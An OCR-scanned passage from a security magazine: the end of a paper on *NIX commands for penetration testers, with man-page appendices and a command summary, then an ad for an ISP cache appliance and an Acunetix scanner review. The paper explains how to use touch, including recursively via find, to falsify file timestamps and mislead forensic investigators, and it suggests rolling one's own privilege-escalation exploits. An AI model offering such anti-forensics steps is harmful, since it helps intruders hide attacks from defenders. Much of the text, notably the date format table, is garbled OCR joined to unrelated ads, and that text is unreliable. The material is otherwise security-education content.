Next, it is a concern to the forensic professional. Hiding 
files through reversing them makes the process of discov- 
ery a proverbial search for the needle in a haystack. 

An interesting effect to try is to maintain the header on 
a bitmap file (i.e. skip the first portion of the file and re- 
verse the later parts). What ends up occurring is that the 
image can be recreated upside down. All types of interest- 
ing effects can be found. 

As always, the cards are stacked in favor of the attack- 
er. When in a contest that pits rules against open moral- 
ity, rules lose more than not. This does not mean that we 
give up, only that we have to understand the odds that are 
stacked against us and that it is also the case that people 
naturally err. This is when we (the “good” guys) win. 

For security professionals to be successful, we need to 
think outside the box. 


touch 
The *NIX touch command can be used to change the ac- 
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cess and modification times on an existing file or directory 
or to create a new file. There is a common belief that the 
touch command can change any time entry (including the 
change time or, on some systems, the create time); this 
is not correct. The change time and created time of a file 
needs to be modified in other ways (such as extracting 
files from TAR archives). 

lf a file does not exist on the system, the touch com- 
mand will create it. The touch command can be used to 
update or create the access and modification times, set- 
ting these to a specified predefined value. If the option to 
set a new timestamp is not used, the command will set the 
current time. 

The command's options include: 


¢ a: change the access time 

¢ =m: change the modification time 

¢ r <file>: set the access and modification times of 
the file being changed to be the same as that of one 
named <file> 

¢ t <time>: set the time specified by <time> when up- 
dating the access and modification times 


The touch command uses the format [[cc]yy]JMMD- 
Dhhmm|[.ss]. These are defined as follows: 


e¢ MM: the two-digit numeric month, 

¢ DD: the two-digit numeric day, 

e hh: the two-digit numeric hour, 

¢ mm: the two-digit numeric minutes, 

¢ ss: Sets the two-digit seconds, 

¢ cc: the first two digits of the year, and 
¢ yy: the last two digits of the year. 


The touch command can be used without options to set 
the current time. This is done to simulate an update to a 
file without actually accessing it. For an attacker, this can 
be used to hide an attack. Setting a false path can lead 
an investigator into checking the wrong files and wasting 
valuable time. 

For instance, running “touch /bin/sh” could be used to 
lead an investigator into checking the use of the “/bin/sh” 
command shell when another shell was really used. The 
contents of the “/bin/sh” file are not changed, the time- 
stamps are updated to reflect the system’s current date 
and time. Alternatively, an attacker could also change the 
timestamps of files to have these seem to have been ac- 
cessed at any other time (including a time in the future). 

lf you know that an administrator logs into a system 
at 9.30 am each day, you could set the files touched in 
the login process back to the prior date (for instance, to 
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09.30am on Monday 9th March 2009). 
touch -a -t ‘2009-03-09 9:32:21’ /bin/csh 


This command will change the access time of the “/bin/ 
csh” command shell to March O9th, 2009 at 9:32:21am. 

One unfortunate aspect of the touch command is that 
it is not recursive. You have to touch each file or create 
a script to do this. Fortunately, this is simple. For example, 
linking the find command to touch using exec will allow 
you to selectively update a number of files and even re- 
curse through directories: 


e — find . -exec touch {} \; 
e find . | xargs touch 
e — find . -printO | xargs -O touch 


Where long file names and spaces are used, the last find 
option above will handle this. 

The real secret is to use the touch command in scripts. 
As you run an attack to validate a system, update the ac- 
cess time to that which it previously was set to. 


Programming tools 

It is simple when compilera or other tools are installed on 
a system. In this event, a tester can simply add any tools 
that are desired by compiling them on the host. Source 
code can be uploaded over ASCII connections, such as 
telnet, so even a console can be used to load your favorite 
tools when compilers are installed. 

In many cases, compilers and other similar tools have 
been restricted or (ideally) not installed on production sys- 
tems. Where this is the case, it is still common to discover 
many related tools (including disassemblers) on a host. 
Some of these tools are covered in this section. 

In many instances, systems will not have tools at your 
disposal that can easily be used to test privilege escala- 
tion. In this instance, it may be necessary to “roll your own” 
exploit. Stack and Heap overflows are all too common in 
software. Even where patches are available, it is all too 
common to find patches missing. This can be a result of 
legacy systems not functioning when the patch is applied, 
or a simple failure for any reason to have applied the patch. 

In these instances, an attacker could exploit a flaw in 
the software to gain additional privileges on the system 
(maybe even root). 


GDB / DBX 

The “gdb” is a software debugger in Linux and “dbx” is 
essentially the same in UNIX. These commands are com- 
monly found on systems where compilers have been re- 
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moved as many system administrators are uncertain of 
their use. 

There are many useful tutorials on the web for both gdb 
and dbx. Some of these include: 


¢ http://www.ece.unm.edu/faculty/jimp/310/nasm/gadb.pdf 
¢ http://dirac.org/linux/gdb/ 


These are highly advanced tools, so | have left them to the 
end of this paper. The boon of finding them on a system 
cannot be beaten. These tools are primarily used when 
looking for exploitable flaws on a system. If you can copy 
an executable from the system, this can be run and verified 
on another *NIX system. Any exploitable flaws can then be 
discovered and used in the testing and validation process. 


objdump 
The “objdump” command is a disassembler similar to gdb. 
It is not a debugger. This difference means that you can 
disassemble the executable binary without actually hav- 
ing to execute it. This can come in handy when you are 
looking for poorly constructed binaries (e.g. those with 
stack overflows) but are not ready to execute these. 

This also gets around the issue where a binary has read 
privileges for a user account used by the tester but not 
execute rights. 


readelf 

The “readelf’ command is similar to “objdump” with more 
detailed information being provided on ELF headers (Ex- 
ecutable and Linking Format). It is used in the analysis 
of executable binary files to view the GOT (Global Offset 
Table) and the PLT (Procedural Linkage Table). 


Itrace / strace 

The “ltrace” tool is used to intercept and record library 
calls. It is similar to “strace”. The ‘“Itrace” command ex- 
ecutes a program recording all of the library calls made 
and any signals that are received. “strace” also records 
system calls as well as library calls. 


Appendixes 
The following pages are a list of Appendixes and provide 
“MAN* entries and external sources to the paper. 


Appendix 1 - *NIX Commands 

The following are a list of the “MAN” or manual pages for a 
couple of the commands listed in this paper. These will vary 
with respect to the system they are run on and it is essential 
to always familiarize yourself with the particularities of the 
system that you are working on. These pages are taken from 
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the author’s system. These are direct entries from the *NIX 
“man” entries and have only been slightly modified for style 
and format. Not all commands used in this paper have been 
included. A small sample has been copied in order to help 
you become familiar with the output of the MAN command. 
“date” 

The “date” command displays the current time in the given 
FORMAT, or can be used to set the system date. 


¢ date [OPTION]... [-FORMAT] 
¢ date [-u|--utc]--universal] [MMDDhhmm[[CC]YY][.ss]] 


The command options are: 

-d, --date=STRING 

display time described by STRING, not ‘now’ 
-f, --file=DATEFILE 

like --date once for each line of DATEFILE 
-r, --reference=FILE 

display the last modification time of FILE 

-R, --rfc-2822 

output date and time in RFC 2822 format 
——PTC-3339=T I IMESPEC 


output date and time in RFC 3339 format. TIMESPEC 
=date’, ‘seconds’, or ‘ns’ for date and time to the indicat- 
ed precision. 

-s, -—-set=STRING 

set time described by STRING 

=U; =SutCc, == versal 

print or set Coordinated Universal Time. 

--help display this help and exit 


--version 


output version information and exit. 
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FORMAT controls the output. The only valid option for 
the second form specifies Coordinated Universal Time. 
Interpreted sequences are: 


° 


a literal % 


oe 
oe 


oe 
@ 


locale’s abbreviated weekday name (e.g., Sun) 


oe 
ae 


locale’s full weekday name (e.g., Sunday) 


fo\\e) 
oO 


locale’s abbreviated month name (e.g., Jan) 


fo\\e) 
Ww 


locale’s full month name (e.g., January) 


locale’s date and time (e.g., Thu Mar 3 23:05:25 2005) 


ae 
Q 


ae 
O) 


century; like %Y, except omit last two digits 


(e.g., 21) 


oe 
Oo, 


day of month (e.g, 01) 


fo\\e) 
O 


date; same as %m/%d/Sy 


ae 
O 


day of month, space padded; same as *d 


fo\\e) 
rr 


full date; same as %Y-%m-%d 


the last two digits of the year corresponding to the %V 


ae 
oO 


week number 


oe 
Gq) 


the year corresponding to the %V week number 


oe 
iy 


same as %b 
hour (00..23) 
hour (O01L..12) 


oe fo\\e) 
Ho 





6] day of year (001..366) 

ok bout. ( -U.<23) 

$l hour ( 1..12) 

$m month (01..12) 

‘6M minute (00..59) 

on a newline 

SN nanoseconds (000000000. .999999999) 

Sp locale’s equivalent of either AM or PM; blank if 
not known 

6P like %p, but lower case 

Sr locale’s 12-hour clock time (e.g., 11:11:04 PM) 

SR 24-hour hour and minute; same as %H:%M 

6s seconds since 1970-01-01 00:00:00 UTC 

6S second (00..60) 

st a tab 

6T time; same as %H:%5M:%S 

Su day of week (1..7); 1 is Monday 

SU week number of year with Sunday as first day of week 
(00% «oa 

SV week number of year with Monday as first day of week 
(Ol.« 53) 

sw day of week (0..6); 0 is Sunday 

SW week number of year with Monday as first day of week 
(00.253) 

Sx locale’s date representation (e.g., 12/31/99) 

6X locale’s time representation (e.g., 23:13:48) 

Sy last two digits of year (00..99) 


ae 
K 


year 


oe 
N 


+hhmm numeric timezone (e.g., -0400) 
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6:zthh:mm numeric timezone (e.g., -04:00) 


6::zZ +thh:mm:ss numeric time zone (e.g., -04:00:00) %S:::z 
numeric time zone with : 
=04, #05230) 
(e.g., EDT) 


to necessary precision (e€.g., 


6Z alphabetic time zone abbreviation 


By default, the “date” command pads numeric fields with 
zeroes. The following optional flags may follow ‘%’: 

- (hyphen) do not pad the field _ (underscore) pad 
with spaces O (zero) pad with zeros “ use upper case if 
possible # use opposite case if possible. After any flags 
comes an optional field width, as a decimal number; 
then an optional modifier, which is either E to use the 
locale’s alternate representations if available, or O to 
use the locale’s alternate numeric symbols if available. 


“dd” 

dd [bs=s] [cbs=s] [conv=conversion] [count=n] [1ibs=s] 
[if=file] [imsg=string] [1iseek=n] [obs=s] [of=file] 
[omsg=string] [seek=n] [skip=n] 


DESCRIPTION 

dd reads and writes data by blocks, and can convert the 
data between formats. dd is often used for devices such 
as tapes which have discrete block sizes, or for fast multi- 
sector reads from disks. The conversions can accommo- 
date systems that need de-blocking, conversion to/from 
EBCDIC and fixed length records. 

dd processes input data as follows: 


1. dd reads an input block. 

2. If you specified conv=syne and this input block is 
smaller than the specified input block size, dd pads 
it to the specified size with null bytes. By also spec- 
ifying a block or unblock conversion, dd implements 
spaces instead of null bytes. 

3. If bs=size IS specified and requested no conversion 
other than sync or noerror, dd writes the input block 
(padded where necessary) to the output as a single 
block and omits the remaining steps. 

4. By specifying the swab conversion, dad swaps each 
pair of input bytes. If there is an odd number of input 
bytes, dd does not attempt to swap the last byte. 

5. dd performs all remaining conversions on the input da- 
ta independently of the input block boundaries. A fixed- 
length input or output record may span these boundaries. 

6. dd collects the converted data into output blocks of 
the specified size. When dd reaches the end of the 
input, it writes the remaining output as a block (with 
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added padding if the conv=sync option is used). Con- 
sequently, the final output block can be smaller than 
the output block size. 


Parameters 


bs=size 

This option sets both input and output block sizes to size 
bytes. You can suffix this decimal number with w, b, k, or 
xnumber to multiply it by 2, 512, 1024, or number, respec- 
tively. You can also specify size as two decimal numbers 
(with or without suffixes) separated by x to indicate the 
product of the two values. Processing is faster when ibs 
and obs are equal, since this avoids buffer copying. The 
default block size is 1b. bs=size Supersedes any settings 
of ibs=size OF obs=size. Specifying bs=size with no other 
conversions than noerror, notrunc, or sync, dd writes the 
data from each input block as a separate output block. In 
the event that the input data is less than a full block and 
you did not request sync conversion, the output block is 
the same size as the input block. 


cbs=size 

Sets the size of the conversion buffer used by various 
conv options. It is possible to specify this option in the 
same way as for bs. 


conv=conversion[, conversion, ...] 
This option specifies conversion method. Conversion can 
be any of the following: 


ascii 

Converts EBCDIC input to ASCII for output. dd copies 
cbs bytes at a time to the conversion buffer, maps them 
to ASCII, then strips trailing blanks, adds a newline, and 
copies this line to the output buffer. 


block 

Converts variable-length records to fixed-length records. 
dd treats the input data as a sequence of variable-length 
records (each terminated by a newline or an EOF char- 
acter) independent of the block boundaries. dd converts 
each input record by first removing any newline charac- 
ters, then padding (with spaces) or truncating the record 
to the size of the conversion buffer. dd reports the number 
of truncated records on the standard error. It is necessary 
to specify cbs=size with this conversion setting. 


ebcdic 
Converts ASCII input to EBCDIC for output. dd copies a 
line of ASCII to the conversion buffer, discards the newline, 
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pads it with trailing blanks to cbs bytes, maps it to EBCDIC 
and copies it to the output buffer. 


ibm 
Converts ASCII to a variant of EBCDIC which gives better 
output on many IBM printers. 


Icase 
Converts uppercase input to lowercase. 


noerror 
Ignore errors on input. 


notrunc 

The option sets dd so that it does not truncate the out- 
put file. If a block is explicitly written, it replaces the exist- 
ing block; all other blocks are unchanged. See also of=file 
and seek=n. 


swab 

Swaps the order of every pair of input bytes. If the current 
input record has an odd number of bytes, this conversion 
does not attempt to swap the last byte of the record. 


sync 

Pads any input block shorter than ibs to that size with null 
bytes before conversion and output. If you also specified 
block or unblock, dd uses spaces instead of null bytes 
for padding. 


ucase 
Converts lowercase input to uppercase. 


unblock 

Converts fixed-length records to variable-length records 
by reading a number of bytes equal to the size of the con- 
version buffer (or the number of bytes remaining in the 
input, if less than the conversion buffer size), deleting all 
trailing soaces, and appending a newline character. You 
must specify cbs=size with this conversion. 


convfile 

Deploys convfile as a translation table if it is not one of 
the conversion formats listed here and it is the name of a 
file of exactly 256 bytes. It is possible to perform multiple 
conversions at the same time by separating arguments to 
conv with commas; however, some conversions are mutu- 
ally exclusive (for example, ucase and Icase). 


count=n 
Copies only n input blocks to the output. 
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ibs=size 
Sets the input block size to size bytes. Specify this option 
in the same way as bs. 


if=file 
Reads input data from file. If you don’t specify this option, 
dd reads data from the standard input. 


imsg=string 

Displays string when all data has been read from the cur- 
rent volume, replacing all occurrences of %d in string with 
the number of the next volume to be read. dd then reads 
and discards a line from the controlling terminal, giving 
you a chance to change volumes (usually a floppy disk). 


iseek=n 

Seeks to the nth block of the input file. The distinction be- 
tween this and skip is that iseek does not read the dis- 
carded data; however there are some devices, such as 
tape drives and communication lines, on which seeking is 
not possible, so only skip is appropriate. 


obs=size 

Sets the output block size to size bytes. Specify this option 
in the same way as bs. The size of the destination should 
be a multiple of the value chosen for size. For example, 
if you choose obs=10k, the destination’s size should be a 
multiple of 10k. 


of=file 

Writes output data to file. Without setting this option, 
dd writes data to the standard output. dd truncates the 
output file before writing to it, unless you specified the 
seek=n operand. If you specify seek=n, but do not specify 
conv=notrunc, dd preserves only those blocks in the out- 
put file over which it seeks. If the size of the seek plus the 
size of the input file is less than the size of the output file, 
this can result in a shortened output file. 


omsg=string 

Displays string when dd runs out of room while writing to the 
current volume. Any occurrences of a in string are replaced 
with the number of the next volume to be written. dd then 
reads and discards a line from the controlling terminal, giv- 
ing you a chance to change volumes (usually a floppy disk). 


seek=n 
Initially seeks to the nth block of the output file. 


skip=n 
Reads and discards the first n blocks of input. 
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“which” 
syntax 


which [options] [--] program name [...] 
Options 

--all, -a 

Print all matching executables in PATH, not just the first. 
--read-alias, -i 


Read aliases from stdin, reporting matching ones on std- 
out. This is useful in combination with using an alias for 


779) 


which itself. (e.g. “alias which=’alias | which -i’”). 
--skip-alias 

Ignore option --read-alias, if any. This is useful to explic- 
itly search for normal binaries, while using the “--read- 
alias” option in an alias for which. 

==— p= doL 

Skip directories in PATH that start with a dot. 


--skip-tilde 


Skip directories in PATH that start with a tilde and exe- 
cutables which reside in the HOME directory. 


==Show-0o 

lf a directory in PATH starts with a dot and a match- 
ing executable was found for that path, then print “./pro- 
gram_name’ rather than the full path. 


--show-tilde 


Output a tilde when a directory matches the HOME direc- 
tory.This option is ignored when which is invoked as root. 


--tty-only 

Stop processing options on the right if not on tty. 
--version, -v, -V 

Print version information on standard output then exit 


successfully. 
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--help 


Print usage information on standard output then exit suc- 
cessfully. 


RETURN VALUE 
Which returns the number of failed arguments, or -1 when 
no program name was supplied. 


EXAMPLE 
A useful way to use this command is by adding an alias for 
which like the following: 


alias which=’which --tty-only --show-tilde --show-dot’ 


This will print the readable ~/ and ./ when starting which 
from your prompt, while still printing the full path when 
used from a script: 


> which ssh 
ajiyer/bin/ sah 
> echo “which ssh° 


/home/hacker/bin/ssh 


Aliases are also supported. An example alias for which 
that is using this feature is as follows: 


alias which=’alias | which --tty-only --read-alias --show- 


tilde --show-dot’ 


This will print the output of alias for each alias that 
matches one of the given arguments. For example, using 
this alias on itself in a tcsh: 


S alias which alias \| /usr/bin/which -i !\* 


S which which 


which (alias | ./which -i !*) 


/usr/bin/which 

“uname” 

The “uname” command will output system information about 
the host and operating system it is run from. When no op- 
tions are supplied, ‘uname’ acts as if the ‘-s’ flag was given. 
Syntax 

uname [options]... 


Options 


-~a, --all 
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Display all of the information from the flags list- 
ed below. 


-m, --machine 
Display the host (hardware) type. 

-n, --nodename 

Display the host’s network node hostname. 
-p, --processor 

Display the host's processor type. 

-r, --release 

Display the operating system release. 

-s, —-sysname 


Display the operating system name. 


Print the operating system version. 
If multiple options or ‘-a’ are supplied, the selected infor- 
mation is printed in this order: 


Sysname Nodename 
Release Osversion Machine 
The OSVERSION may consist of multiple words. For instance: 


Suname -a 
=> Linux linux-0915 2.6.25.16-0.1l-pae #1 SMP 2008-08-21 
00:34:25 +0200 i686 i686 i386 GNU/Linux 


Command Summary 
The following are a list of “NIX commands and a quick 
summary of their use. 


A 


alias: Create an alias 


apropos: Search Help manual pages (man -k) 


at: Execute scheduled command at a time 


awk: Find and Replace text 
B 


bash: GNU Bourne-Again Shell 
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bg: Send to background 


break: Exit from a loop 


C 


case: Conditionally perform a command 

cat: Display the contents of a file 

cd: Change the Directory 

cfdisk: Partition table manipulator for Linux 

chgrp: Change group ownership 

chmod: Change access permissions 

chown: Change file owner and group 

chroot: Run a command with a different root directory 
chkconfig: System services (runlevel) 

cksumPrint: CRC checksum and byte counts 

clear: Clear the terminal screen 

cmp: Compare two files 

comm: Compare two sorted files line by line 

command: Run a command - ignoring shell functions 
continue: Resume the next iteration of a loop 

cp: Copy one or more files to another location 

cron: Daemon to execute scheduled commands 

crontab: Schedule a command to run at a later time 
csplit: Split a file into context-determined sections 


cut: Divide a file into several parts 


D 


date: Display or change the date & time 

dd: Convert and copy a file, write disk headers, boot records 
declare: Declare variables and give them attributes 

df: Display free disk space 

diff: Display the differences between two files 

dig! DNS Lookup 

dmesg: Print kernel & driver messages 


du: Estimate file space usage 


echo: Display message on screen 

egrep: Search file(s) for lines that match an extended 
(regex) expression 

eject: Eject removable media 

emacs: A test editor 

enable: Enable and disable built-in shell commands 

env: Set or view environment variables 

ethtool: Ethernet card settings 

eval: Evaluate several commands/arguments 

exec: Execute a command 

exit: Exit a shell 

expect: Automate arbitrary applications accessed over 


a terminal 
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expand: Convert tabs to spaces logname: Print the user’s current login name 
export: Set an environment variable logout: Exit a login shell 
expr: Evaluate expressions lpr: Print a file 


lprm: Remove jobs from the print queue 


F ls: List information about file/files 





lsof: List open files 


fg: Send job to foreground 


fgrep: Search file(s) for lines that match a fixed string M 
file: Determine the file’s type (1i.e., pdf, text, etc.) 
find: Search for files that meet a desired criteria make: Re/Compile a program 
for: Expand words, and execute commands - used for looping man: The *NIX help manual 
in shells mkdir: Create new folder/folders 
format: Format disks or tapes mkfifo: Make FIFOs (named pipes) 
free: Display memory usage mknod: Make block or character special files 
ftp: File Transfer Protocol more: Display output one screen at a time 


mount: Mount a file system 


G mv: Move or rename files or directories 


gawk: Find and Replace text within a file/files N 

grep: Search file(s) for lines that match a given pattern 

groups: Print group names a user is in netstat: Display network information 

gzip: Compress or decompress named file/files nice: Set the priority of a command or job 


nslookup: Query DNS servers interactively 


H 
O 
head: Output the first part of file(s) 
history: Print the command history open: Open a file in its default application 
hostname: Print or set the host’s system name 
p 


passwd: Modify a user’s password 





id: Print user and group ids ping: Test a network connection 
if: Conditionally perform a command popd: Restore the previous value of the current directory 
ifconfig: Configure a network interface pe: Process status 
ifdown: Stop a network interface pushd: Save and then change the current directory 
ifup: Start a network interface up 
import: Capture an X server screen and save the image Q 
to file 


quota: Display disk usage and limits 

K quotacheck: Scan a file system for disk usage 
quotactl: Set disk quotas 

kill: Stop or end a running process 


killall: Kill processes by name R 


L ram: Create and manage a RAM based disk device 


rcp: Copy files between two machines 


less: Display output one screen at a time read: Read a line from standard input 

let: Perform arithmetic on shell variables reboot: Reboot the system 

In: Make links between files renice: Alter priority of running processes 
local: Create variables remsync: Synchronize remote files via email 
locate: Find files return: Exit a shell function 
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rev: Reverse lines of a file 
rm: Remove files 
rmdir: Remove folder/folders 


rsync: Remote file copy (Synchronize file trees) 


Ss 


screen: Multiplex terminal, run remote shells via ssh 
scp: Secure copy (remote file copy) 

sdiff: Merge two files interactively 

sed: The stream Editor 

select: Accept keyboard input 

seq: Print numeric sequences 

set: Manipulate shell variables and functions 

sftp: Secure File Transfer Program 

shift: Shift positional parameters 

shopt: Shell Options 

shutdown: Shutdown or restart linux 

sleep: Delay for a specified time 
slocate: Find files 

sort: Sort text files 

source: Run commands from a file °.’ 

split: Split a file into fixed-size sections 

ssh: Secure Shell client (an encrypted remote login program) 
strace: Trace system calls and signals 

su: Substitute user identity 

sudo: Execute a command as another user 


sum: Print a checksum for a file 


T 


tail: Output the last part of files 

tar: Tape Archiver 

tee: Redirect output to multiple files 

time: Measure a program’s running time 

touch: Change file timestamps 

top: List the processes running on the system 
traceroute: Trace the Route to a Host over a network 
trap: Run a command when a signal is set (bourne) 
tty: Print filename of terminal on stdin 


type: Describe a command 


U 


ulimit: Limit user resources 

umask: Change a user’s file creation mask 
umount: Unmount a device 

unalias: Remove an alias 

uname: Print system information 


unexpand: Convert spaces to tabs 





unset: Remove variable or function names 
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unshar: Unpack shell archive scripts 

until: Execute commands (until error) 

useradd: Create a new user account 

usermod: Modify a user account 

users: List the currently logged in users on a system 


uuencode: Encode a binary file 





uudecode: Decode a file created by uuencode 


V 


vi: Text Editor 


vmstat: Report virtual memory statistics 


W 


watch: Execute or display a program periodically (that is 
every so often) 

we: Print byte, word, and line counts 

whereis: Report all known instances of a command 

which: Locate a program file in the user’s path. 

while: Execute commands when a statement is true 

who: Print all of the usernames currently logged into 
a host 

whoami: Print the current user id and name (°id -un’) 

wget: Retrieve web pages or files via HTTP, HTTPS or FTP 


write: Send a message to another user on a host 


CRAIG S. WRIGHT 
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mehilop 
Beiter. 
Reliable. 
Trusted by over 500 ISPs worldwide. 


Hyper is the first multimedia cache fully developed in Brazil, by Taghos. 
With Hyper, ISPs can save on network bandwidth while increasing 
content-delivery speeds, resulting in end-customer satisfaction. 






Features: 

ODS ee CNSR OIL UNO 

- Active monitoring 

- Automatic updates 

- Appliance or license 

- Easy deployment 

- Configuration and reports via 
web interface 





Cache 
Up to 15 Mbps 1x 11B 
Up to 50 Mbps 2x 11B - 
Up to 100 Mbps 8 G 2X 11B 1x 160 GB 
Up to 150Mbps | 3x 2 TB 1x 160 GB 
Up to 300 Mbps 5x 2 TB 1x 240 GB 
| Up to 500 Mbps 32 7x 2B 1x 480 GB 
0 Up to 1 Gbps 4G 10x 1 1B 1x 480 GB 
Remote Instal| Up to 2 Gbps 24x11B 3x 480 GB 


13000 Up to 3 Gbps 28G 32x 1 1B 5x 480 GB 


Using your hardware 


Visit us at WWW.taghos.com and start saving bandwidth today! 


Acunetix Web 





Vulnerability Scanner 


Find out if your website is secure before hackers download 
sensitive data, commit a crime by using your website as a 
launch pad, and endanger your business. Acunetix Web 
Vulnerability Scanner (WVS) crawls your website, automatically 
analyzes your web applications and finds perilous SQL 
injections, Cross site scripting and other vulnerabilities that 
expose your online business. Concise reports identify where 
web applications need to be fixed, thus enabling you to 
protect your business from impending hacker attacks! 


professionals can no longer focus on the patching and 
infrastructure vulnerabilities. If regulations or industry 
standards are not your driver, you can guarantee that cli- 
ents will soon be asking “how are you securing your appli- 
cations?” As with any solution you need to have the peo- 
ple, processes, and technology in place to be successful. 
While much of this testing could be done manually, the 
proliferation of applications used in organizations today 
would make manual testing an insurmountable and nev- 
er-ending task. Application Security testing tools are often 
the best solution for security professionals tasked with se- 
curing applications throughout the Software Development 
Lifecycle (SDLC). This is where we introduce Acunetix! 
As a precursor to the remainder of this article, | have 
had the opportunity to work with a number of Application 
Security tools for large enterprises. This is the first time | 
have worked directly with Acunetix. 


n today’s threat landscape, organizations and security 


What is Acunetix Web Vulnerability Scanner 
In Acunetix’s own words: 


“Un .. a Hy 1A/ |, iy, lA . Ai hitvy CrANnn r Ic - me tAmM L i lL, 
Acunetix Web Vulnerability Scanner is an automated web 


- ~rrlirn yi ~ i) cCOris i+ 1 +e cy ; > A ry | + fH yf yi Artec fori LA e P ’ ylicrA 
application security testing tool that audits your web applica- 
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Hons hy checking for viiInerghilites like SOI Iniection Cross site 
tions by checking for vulnerabilities like SQL Injection, Cross site 


in pe per Ia nn nthor ovnlhnitnhlyo \vwnarylnornhiljHoc ” 
scripting, and other exploitable vulnerabilities. 


The need to be able to test applications in depth and 
further than traditional vulnerability management tools 
(e.g. Nessus, Nexpose, etc.) do, has created a market 
with several players in the Application Security space. 
Whereas Nessus / Nexpose are vulnerability manage- 
ment (VM) tools, Acunetix focuses more on web appli- 
cation vulnerabilities and variants thereof, and does 
a much better job at detection than traditional VM tools. 


Key Features and Functionality 

| could spend time walking you through how to complete 
a scan with Acunetix, but the “getting started” and “user 
manual” provide a wealth of information for this. The best 
use of your time will be to understand the features that 
distinguish Acunetix from the other vulnerability scanners. 


¢ Vulnerability Detection — First and foremost, does 
the Acunetix do what is says it does? The resound- 
ing answer is...YES! The ability to scan HTML5/JS 
sites provides coverage where a number of prod- 
ucts start to fall apart. Additionally, the speed of the 


11/2014 





Acunetix Web Vulnerability Scanner 


scanner allows scans to be completed in very little 
time. When | did a side by side comparison | found 
a number of features with Acunetix | did not see with 
OSS (Open Source Software) products; 

¢ AcuSensor — AcuSensor is an agent installation that 
is installed on the web server for testing purposes, in- 
teracting with the console. This allows the number of 
false positives to be reduced as the scanner is not on- 
ly relying on HTTP responses but will also interact with 
the agent on the server to determine if the test was 
successful or not. At the time of this writing, AcuSen- 
sor is used primarily with PHP and .NET web applica- 
tions. | understand that other products have this simi- 
lar technology for JAVA so before investing make sure 
you understand how your applications were written so 
you can fully take advantage of this. To emphasise, 
AcuSensor identifies more vulnerabilities than a tra- 
ditional black box web security scanner and reduc- 
es false positives. AcuSensor will show you the line 
of code where it found the vulnerability, which helps 
you to get it fixed faster. This is achieved by combin- 
ing black box scanning techniques with dynamic code 
analysis whilst the source code is being executed. 

¢ Itis also possible to detect some vulnerabilities using 
an intermediary server. AcuMonitor allows Acunetix 
WVS to find such vulnerabilities, including Blind XSS, 
Server Side Request Forgery and Email Header In- 
jection. It depends on the vulnerability but it can be 
reported during the scan and also by an email which 
will be sent directly to the user. 

¢ Tools — These are a few of the features that jumped 
out at me right away. Some of the tools are not some- 
thing you'd expect to see in a Web Application Secu- 
rity scanner, but such tools aid interpretation of the 
scan results. 


* Tools 
(3 Site Crawler 


he )» Target Finder 


~~, Subdomain Scanner 
--(@) Blind SQL Injector 


{Ss HTTP Editor 
A HTTP Sniffer 
dae ATTP Fuzzer 
- &) Authentication Tester 


= la Compare Results 


Figure 1. 
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¢ Target Finder — This functionality lets you scan 
subnets looking for web services by port (e.g. 80, 
443, etc.). This functionality is important especially 
in organizations where there is uncertainty where 
web services are actually running and where 
some malware might have installed web servers 
on users’ machines.This is something that is miss- 
ing in some of the other products out there today. 

¢ Subdomain scanner — this is another feature that 
| did not expect to find in a web security scan- 
ner. The ability to search for subdomains based 
on DNS records automatically is another valu- 
able tool for someone trying to get a handle on 
their environment. 

¢ Compare Results — Conducting repeat scans to 
confirm that issues have been remediated has 
been problematic in other tools. This feature made 
the issues between each test easy to distinguish. 

¢ The Scheduler — Acunetix allows you to schedule 
your scans for a single site or multiple sites. This 
is a great feature in a vulnerability scanner as it 
allows you to test during those late night mainte- 
nance windows without giving up those precious 
hours of sleep or drinking! 

¢ Single Pane Navigation — While this is more of a 
preference, there were many instances where | 
have spent time reviewing issues with application 
teams having to flip through multiple screens. The 
Acunetix issue Summary is managed in one pane 
with all the relevant information provided such as 
issue details, issue Summaries, and recommend- 
ed fixes. The tools mentioned above are all in the 
same frame as well. 


Other Useful Functionalities 

It is impossible to detail all the functionalities of the scan- 
ner in one article but these last few certainly deserve 
a mention. 

One of these is the ability of Acunetix to crawl and scan 
HTML5/JS sites including Angular JS, which is already 
ahead of the pack in version 9.5 and I’m told will be fur- 
ther strengthened in version 10. This is one feature which 
readers should find very useful. 

Another plus is that the information is easy to under- 
stand, the vulnerabilities are categorized allowing the user 
to focus on the most important alerts, and the results in- 
clude information on the vulnerability, remediation advice 
and are augmented with external references. In addition, 
whilst working on the review, the Bash vulnerability was 
discovered, and within 24 hours Acunetix notified of an 
update for a check for Shellshock. 
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Positives 


Easy to use — Acunetix is extremely easy to use right 
after being installed. Additionally, it allowed me to 
configure the scan with some more in depth testing 
options to ensure | covered most of the application 
without sacrificing speed. All key features and func- 
tionality are contained within the application (i.e. is- 
sue retest, scan templates, CVE info, Web Services 
scanning, etc.) and easily found so that the documen- 
tation provided is rarely needed. The additional tools 
(Target finder, subdomain scanners, port scanner, 
etc.) for discovery of your environment are a great ad- 
dition to the product. 

Application Authentication — Authenticating your ap- 
plication is important, as you want to make sure you 
cover your entire application as part of the test. This 
has always been challenging in other products (even 
with a completely separate application to manage au- 
thentication). Acunetix did a good job of handling the 
application authentication through various applica- 
tions without much hassle. 

Pricing — | have worked with other solutions before 
and pricing always seemed to be complex and tiered. 
The Acunetix pricing model is very straightforward 
and very reasonably priced. (https:/www.acunetix. 
com/ordering/). 

Product Transparency — Any time | evaluate any 
product | open my favourite search engine and type 


in ‘$productname bugs’ or ‘$productname request for 
enhancements’ to find some forums on problems that 
current users are having. | was surprised to see that 
Acunetix will make all this information available to all 
people including non-customers. http://acunetixwvs. 
ideascale.com/a/ideatfactory.do This is of some reas- 
surance that you're not falling into that slippery sales- 
man approach and that you know what you are buy- 
ing. Check out this page! 

The comparative analyses of similar priced compet- 
itor scanners show that Acunetix scans for and de- 
tects 2 — 3 times the number of vulnerabilities with 
lower false positives and higher confidence. So you 
will scan up to 2 times faster, and you are nonethe- 
less at par or better than the ones that are more high- 
ly priced. This is because of the Acunetix DeepScan 
crawling and scanning technology and also because 
the lab has a much larger collection of scripted or 
choreographed hacking simulations and a wider vari- 
ety of variants that they generate in their War Games 
Lab than most other similarly priced scanners. They 
also provide you with a fully documented SDK for 
scanning script customization. 


Results 


Acunetix focuses on being a good scanner giving 
good technical results and a palette of reports. A 
scan is usually run on a single target. 
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Acunetix Web Vulnerability Scanner 








On the Net 


¢ 14-day Acunetix WVS Download -— http://www.acunetix.com/vulnerability-scanner/download/ 

¢ 14-day Acunetix OVS Registration — http:/www.acunetix.com/vulnerability-scanner/register-online-vulnerability-scanner/ 

¢« Acunetix Website — http:/www.acunetix.com 

